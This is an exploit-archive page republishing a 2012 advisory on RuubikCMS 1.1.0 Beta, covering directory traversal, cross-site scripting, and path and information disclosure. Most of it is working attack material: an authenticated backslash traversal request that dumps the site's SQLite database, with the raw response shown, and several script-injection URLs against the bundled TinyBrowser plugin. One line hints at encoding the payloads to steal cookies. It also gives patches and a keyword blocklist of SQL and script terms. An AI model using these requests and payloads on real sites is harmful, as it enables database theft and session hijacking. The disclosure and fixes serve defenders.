exploit the possibilities

RuubikCMS 1.1.0 Beta XSS / Disclosure / Directory Traversal

RuubikCMS 1.1.0 Beta XSS / Disclosure / Directory Traversal
Posted May 23, 2012
Authored by Akastep

RuubikCMS version 1.1.0 Beta suffers from cross site scripting, information disclosure, and directory traversal vulnerabilities.

tags | exploit, vulnerability, xss, file inclusion, info disclosure
MD5 | dbca1c445b9b9049982dc2e17c9a37be

RuubikCMS 1.1.0 Beta XSS / Disclosure / Directory Traversal

Change Mirror Download
=========================================================
Vulnerable software: RuubikCMS Version 1.1.0 Beta
Official site: http://www.ruubikcms.com/
Downloaded from: http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip
=========================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL: 5.5.24
=========================================================

VUln Desc:
RuubikCMS Version 1.1.0 Beta is prone to Traversal,XSS,
Info And Path Disclosures.
=========================================================

1) Traversal vuln:
//ruubikcms/extra/image.php
Vulnerable code section:
(To exploit this vuln you need to be authenticated against application)
*This vuln can be exploited by users to escalate privileges to admin on windows OS*
==============SNIP==================
<?php
// --- Image displayer with authentication
// --- Sample call: image.php?f=imgfile.jpg
// --- Sample call with subfolder: image.php?f=subfolder/imgfile.jpg

require('../ruubikcms/includes/dbconfig.php');
$dbh = new PDO(PDO_DB_DRIVER.':../'.RUUBIKCMS_FOLDER.'/'.PDO_DB_FOLDER.'/'.PDO_DB_NAME); // database connection object
require('../ruubikcms/includes/commonfunc.php');
define('LOGOUT_TIME', query_single("SELECT logout_time FROM options WHERE id = 1"));
require('login/session.php');

// check if logged in
if (!@$_SESSION['uid']) die("Access denied.");

// images directory
define('BASE_DIR','useruploads/images/');

// make sure program execution doesn't time out
@set_time_limit(0);

if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
if (strstr($_GET['f'], '../')) die('Error');
$fpath = BASE_DIR.$_GET['f'];
if (!is_file($fpath)) die("File does not exist.");

// file size in bytes
// $fsize = filesize($fpath);

// get mime type
$mtype = '';

if (function_exists('mime_content_type')) {
$mtype = mime_content_type($fpath);
} elseif (function_exists('finfo_file')) {
$finfo = finfo_open(FILEINFO_MIME); // return mime type
$mtype = finfo_file($finfo, $fpath);
finfo_close($finfo);
}

if ($mtype == '') {
$mtype = "image/jpeg";
}

header("Content-type: $mtype");
readfile($fpath);
?>
=====================================


We can traverse it on windows OS.
Exploit:

GET /learn/ruubikcms/extra/image.php?f=..\..\..\ruubikcms\sqlite\ruubikcms.sqlite HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: cmslogin=1vbnblnfsb367lgoovsr1qdo2b9c2hav

=============================*RAW responce body:*=============================


HTTP/1.1 200 OK
Date: Tue, 22 May 2012 12:01:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: image/jpeg

34800
SQLite format 3???@
??<???????(???????????????????????????????????????????????????????????????
?????????????????????????????????a%tablepagepage
CREATE TABLE "page" ("pageurl" text PRIMARY KEY ,"name" text,"title" text,"header1" text,"description" text,
"keywords" text,"content" text,"mother" text,"levelnum" integer,"ordernum" integer,"image1" text,"image2" text,
"lang" text,"pagetype" integer,"extracode" text,"status" integer, "updater" TEXT, "updated" TEXT, "creator" TEXT)'
;?indexsqlite_autoindex_page_1page?Ytablesitesite
CREATE TABLE "site" ("id" integer PRIMARY KEY ,"name" text,"doctype" integer,"charset" text,"robots" text,
"title" text,"description" text,"keywords" text,"copyright" text,"author" text,"lang" text,"gacode" text,
"news_textlink" INTEGER,"news_readmore" INTEGER,"news_showdate" INTEGER,"news_maxshort" INTEGER, "no_image1"
INTEGER, "no_image2" INTEGER, "clean_url" INTEGER, "url_suffix" TEXT, "news_num" INTEGER, "siteroot" TEXT,
"news_read??????
???
???x?x????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????)!%)

G?)!%)

G


?RuubikCMS Demoiso-8859-1index,followRuubikCMS DemoRuubikCMSIisakki Piril, Henrik Valrosfi?n
Read more??????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????"



C

??
====================================EOF SNIP=====================================

Use Fiddler to intercept RAW body of responce.




How to fix?:
Open //ruubikcms/extra/image.php
Change the lines no 22 and 23 to this:

//============BEGIN===========
if (strstr(str_ireplace('\\','',$_GET['f']), '../')) die('Error');
$fpath = BASE_DIR.$_GET['f'];
//============END=============





2) Due several XSS vulns in 3'rd party application called TinyBrowser 1.41
(TinyBrowser 1.41 - A TinyMCE file browser (C) 2008 Bryn Jones
(author website - http://www.lunarvis.com))
ruubikcms is also vulnerable to XSS.
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=image&folder=&feid="/>a<script>alert(1);</script>

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&feid="</a><script>alert(1);</script>
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image"</a><script>alert(1);</script>&folder=&feid=owned
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?feid="</a><script>alert("AkaStep");</script>

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&find="><script>alert("AkaStep");</script>


HINT: charcode it if you want to steal cookies.


For @admins,@users,@webmasters:
To prevent XSS vulns in this case see below:(remember this is not ideal solution it is only *workaround*)
Save all this stuff as antikiddie.php and upload it to:

/ruubikcms/tiny_mce/plugins/tinybrowser/

Then open config_tinybrowser.php and include your antikiddie.php
in config_tinybrowser.php


===================BEGIN==============
<?php
error_reporting('off');

/*
//antikiddie.php
include it in your /ruubikcms/tiny_mce/plugins/tinybrowser/config_tinybrowser.php
(at bottom after <?php
)
like this:
include 'antikiddie.php';

ANOTHER NOTE:
we can add more tastes here but that may broke
application's api.So I removed a lot of tastes from here.
*/

$commonpatterns=array("$","/*","*","union",'"','\'',
"0x",
"where","concat","concat_ws","group_concat",
"information_schema","tables","columns","where","concat","concat_ws","group_concat",
"information_schema","tables","columns",'*',
"hex","table_name","column_name","distinct",
"/*!","*/","into","load_file",'(',')',
"outfile","truncate","drop",
"delete",";","+","substr","update",
"hex","table_name","column_name",'\x00','\n','\r','\\','\\x1a',
"schemata","mysql","convert","using","char","$","`","|",
"\\","(","from",")",'mysql',
"table","dumpfile","php",
"distinct",'<','>','<script>','base64','alert','\\','</script>','%0d%0a',
'document.write',',','String.fromCharCode','..','document.cookie','cookie','eval','href','document.location','location.replace','window',
'onmouse','onblur','onfocus','onerror','\'','limit','javascript');


foreach($commonpatterns as $myvals)
{

if(stristr(urldecode($_SERVER['QUERY_STRING']),$myvals))

{


die('<script>alert("No Scriptkidding! :)");</script>'. PHP_EOL .
'<h1>Can\'t Proceed your request! It is malicious.</h1>');
}
}
unset($myvals);
?>



==================END=================


3)Info disclosure to get more info about system:
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/error.log


4)Path disclosure:
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php


Notice: Use of undefined constant NEWS - assumed 'NEWS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 4
NEWS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31



http://192.168.0.15/learn/ruubikcms/extra/login/session.php



Notice: Use of undefined constant LOGOUT_TIME - assumed 'LOGOUT_TIME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\extra\login\session.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/dbconnection.php


Notice: Use of undefined constant PDO_DB_DRIVER - assumed 'PDO_DB_DRIVER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3

Notice: Use of undefined constant PDO_DB_FOLDER - assumed 'PDO_DB_FOLDER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3

Notice: Use of undefined constant PDO_DB_NAME - assumed 'PDO_DB_NAME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3
could not find driver


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/extrapagemenu.php


Notice: Use of undefined constant EXTRAPAGES - assumed 'EXTRAPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 4
EXTRAPAGES



Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/footer.php

Notice: Use of undefined constant VERSION - assumed 'VERSION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant VERNUM - assumed 'VERNUM' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
VERSION VERNUM
Notice: Use of undefined constant THANKYOUTEXT - assumed 'THANKYOUTEXT' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant DOCUMENTATION - assumed 'DOCUMENTATION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant FEEDBACK - assumed 'FEEDBACK' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
THANKYOUTEXT RuubikCMS | DOCUMENTATION | FEEDBACK



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/head.php
See title of page.


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/mainmenu.php
A lot of notices.


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/multilang.php



Notice: Undefined variable: multilang_links in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2

Warning: Invalid argument supplied for foreach() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php


Notice: Use of undefined constant NEWS - assumed 'NEWS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 4
NEWS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/pagemenu.php


Notice: Use of undefined constant WEBPAGES - assumed 'WEBPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 4
WEBPAGES



Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/required.php


Warning: require(../includes/dbconfig.php) [function.require]: failed to open stream: No such file or directory in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4

Fatal error: require() [function.require]: Failed opening required '../includes/dbconfig.php' (include_path='.;C:\php5\pear') in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/snippetmenu.php

Notice: Use of undefined constant SNIPPETS - assumed 'SNIPPETS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 4
SNIPPETS
TinyMCE

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/usersmenu.php

Notice: Use of undefined constant USERS - assumed 'USERS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 4
USERS

Notice: Use of undefined constant ADMINISTRATORS - assumed 'ADMINISTRATORS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 15
ADMINISTRATORS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/login/form.php


http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/filelink/filelink.php



http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_standalone.js.php

function tinyBrowserPopUp(type,formelementid,folder)
{ tburl = "/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php" + "?type=" +
type + "&feid=" + formelementid; if (folder !== undefined) tburl += "&folder="+folder+"%2F";
newwindow=window.open(tburl,'tinybrowser','height=495,width=785,scrollbars=yes,resizable=yes'); if
(window.focus) {newwindow.focus()} return false; }

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_tinymce.js.php
Contains full path to application in plaintext.

http://192.168.0.15/learn/ruubikcms/ruubikcms/website/scripts/jquery.lightbox-0.5.js.php
Direct Plaintext output.




Workaround about info disclosures:

Open ruubikcms\tiny_mce\plugins\tinybrowser\fns_tinybrowser.php

Change the line no 423 to this:
=========BEGIN========
//error_log($err, 3, 'error.log');
=========END==========


or you can try:


=========BEGIN========
error_log($err, 3, 'error_log');
=========END==========

Do not forget remove your old error.log



Workaround about path disclosures:
Open your main .htaccess files (if it doesn't exist on public_html/.htaccess)
create new one and copy/paste this:

==========BEGIN======

php_value error_reporting off




==========END========

This will disable all error reporting if any error,warnings,notices occurs.



Vendor Notified about vulns.




++++As always My Special Thanks to:++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com &&
to all AA Team
++++++++++++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^













Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    3 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close